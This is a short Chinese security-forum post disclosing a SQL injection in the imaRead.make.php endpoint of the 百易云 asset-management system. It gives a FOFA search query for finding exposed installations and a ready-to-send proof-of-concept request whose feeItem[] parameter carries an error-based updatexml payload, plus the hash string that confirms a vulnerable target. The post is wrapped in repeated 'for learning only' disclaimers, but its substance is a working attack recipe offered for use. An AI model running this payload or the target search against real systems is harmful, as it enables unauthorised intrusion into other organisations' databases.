百易云资管系统imaRead.make.php SQL注入-网络安全论坛-网络安全-阻击者联盟

百易云资管系统imaRead.make.php SQL注入

勾八徽章-资深玩家-阻击者联盟等级-LV2-阻击者联盟1个月前发布
100

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述:

百易云资管系统的imaRead.make.php接口存在SQL注入

影响版本:

百易云资管系统

FOFA:

body="不要着急,点此"

POC

/adminx/imaRead.make.php?act=remake
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/123.0

feeItem[]=1+AND+updatexml(1,concat(0x7e,md5(12345678)),1)
可以根据返回结果判断是否存在SQL 注入漏洞,如果返回的内容存在25d55ad283aa400af464c76d713c07ad,即表示存在漏洞。

——–

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面